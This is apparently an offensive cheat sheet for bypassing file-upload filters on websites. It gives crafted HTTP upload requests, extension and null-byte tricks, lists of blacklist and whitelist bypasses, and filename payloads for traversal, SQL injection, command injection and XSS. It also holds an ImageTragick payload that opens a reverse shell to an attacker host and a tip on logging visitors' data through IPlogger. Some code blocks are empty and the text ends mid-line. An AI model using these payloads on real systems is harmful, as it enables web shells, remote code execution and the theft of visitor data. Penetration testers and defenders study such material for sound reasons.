1. Change the `Content-Type` value
```
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```
Change the Content-Type
```
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
```
2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
```
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
```
Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```
3. Upload the payload, but start with GIF89a; and
```
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif
GIF89a;
```
And dont forget to change the content-type to image/gif
4. Bypass content length validation, it can be bypassed using small payload
```
(=`$_GET[x]`?>)
```
5. Using null byte in filename
```
file.php%00.gif
```
6. Using double extensions for the uploaded file
```
file.jpg.php
```
7. Uploading an unpopular php extensions (php4,php5,php6,phtml)
```
file.php5
```
8. Try to randomly capitalizes the file extension
```
file.pHP5
```
9. Mix the tips!
- Upload Function
- Extensions Impact
- `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE
- `SVG`: Stored XSS, SSRF, XXE
- `GIF`: Stored XSS, SSRF
- `CSV`: CSV injection
- `XML`: XXE
- `AVI`: LFI, SSRF
- `HTML`, `JS` : HTML injection, XSS, Open redirect
- `PNG`, `JPEG`: Pixel flood attack (DoS)
- `ZIP`: RCE via LFI, DoS
- `PDF`, `PPTX`: SSRF, BLIND XXE
- Blacklisting Bypass
- PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc`
- ASP → `asp`, `.aspx`, `.cer`, `.asa`
- Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
- Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm`
- Using random capitalization → `.pHp`, `.pHP5`, `.PhAr`
- Whitelisting Bypass
- `file.jpg.php`
- `file.php.jpg`
- `file.php.blah123jpg`
- `file.php%00.jpg`
- `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00.
- `file.php%00`
- `file.php%20`
- `file.php%0d%0a.jpg`
- `file.php.....`
- `file.php/`
- `file.php.\`
- `file.php#.png`
- `file.`
- `.html`
- Vulnerabilities
- [ ] Directory Traversal
- Set filename `../../etc/passwd/logo.png`
- Set filename `../../../logo.png` as it might changed the website logo.
- [ ] SQL Injection
- Set filename `'sleep(10).jpg`.
- Set filename `sleep(10)-- -.jpg`.
- [ ] Command Injection
- Set filename `; sleep 10;`
- [ ] SSRF
- Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor.
- SSRF Through `.svg` file.
```php
```
- [ ] ImageTragic
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
- [ ] XXE
- Upload using `.svg` file
```xml
]>
```
```xml
```
- Using excel file
- [ ] XSS
- Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg